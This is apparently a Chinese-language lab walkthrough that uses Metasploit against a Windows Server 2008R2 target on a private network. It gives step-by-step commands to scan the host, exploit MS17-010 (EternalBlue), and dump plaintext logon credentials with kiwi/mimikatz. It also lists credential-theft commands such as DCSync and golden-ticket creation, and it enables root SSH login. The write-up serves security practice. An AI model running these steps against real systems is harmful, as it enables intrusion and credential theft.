黑客笔记43:kali linux msf入侵windows server 2008R2【靶场】

98 阅读2分钟

更新kali源为国内的阿里源

vim /etc/apt/sources.list

deb mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src mirrors.aliyun.com/kali kali-rolling main non-free contrib

apt-get update

开启ssh远程服务

vim /etc/ssh/sshd_config

设置PermitRootLogin yes

PubKeyAuthentication yes

port 22,去掉注释

systemctl restart ssh

systemctl status ssh

msf入侵windows server 2008R2

kali linux 192.168.147.211

windows server 2008R2 192.168.147.226

OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1

Nmap scan report for 192.168.147.226
Host is up (0.00084s latency).
Not shown: 990 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

msfconsole

search ms17_010

1719632533165.png

use auxiliary/scanner/smb/smb_ms17_010,检测是否存在漏洞

set RHOSTS 192.168.147.226

run

1719632708359.png

use exploit/windows/smb/ms17_010_eternalblue,发起攻击

set RHOSTS 192.168.147.226

run

攻击成功

1719632844904.png

screenshot

1719636504105.png

load -l,可以加载出能用的模块,mimikatz被kiwi取代了

bofloader
espia
extapi
incognito
kiwi
lanattacks
peinjector
powershell
priv
python
sniffer
stdapi
unhook
winpmem

load kiwi

kiwi_cmd sekurlsa::logonpasswords,提取登录用户的明文密码

1719634268421.png

creds_all

1719636176312.png

migrate 504,可以让kiwi运行的更加稳定

1719634471656.png

help kiwi

creds_all:检索所有凭证(已解析)
creds_kerberos:获取Kerberos凭证(已解析)
creds_livessp:获取Live SSP凭证
creds_msv:获取LM/NTLM凭证(已解析)
creds_ssp:获取SSP凭证
creds_tspkg:获取TsPkg凭证(已解析)
creds_wdigest:获取WDigest凭证(已解析)
dcsync:通过DCSync获取用户账户信息(未解析)
dcsync_ntlm:通过DCSync获取用户账户NTLM哈希、安全标识符(SID)和相对标识符(RID)
golden_ticket_create:创建黄金Kerberos票据
kerberos_ticket_list:列出所有Kerberos票据(未解析)
kerberos_ticket_purge:清除所有正在使用的Kerberos票据
kerberos_ticket_use:使用一个Kerberos票据
kiwi_cmd:执行任意Mimikatz命令(未解析)
lsa_dump_sam:转储LSA的安全帐户管理器数据库(未解析)
lsa_dump_secrets:转储LSA机密(未解析)
password_change:更改用户的密码或哈希
wifi_list:列出当前用户的Wi-Fi配置文件及凭证
wifi_list_shared:列出共享的Wi-Fi配置文件及凭证(需要SYSTEM权限)

shell,进入windows命令行

1719636065305.png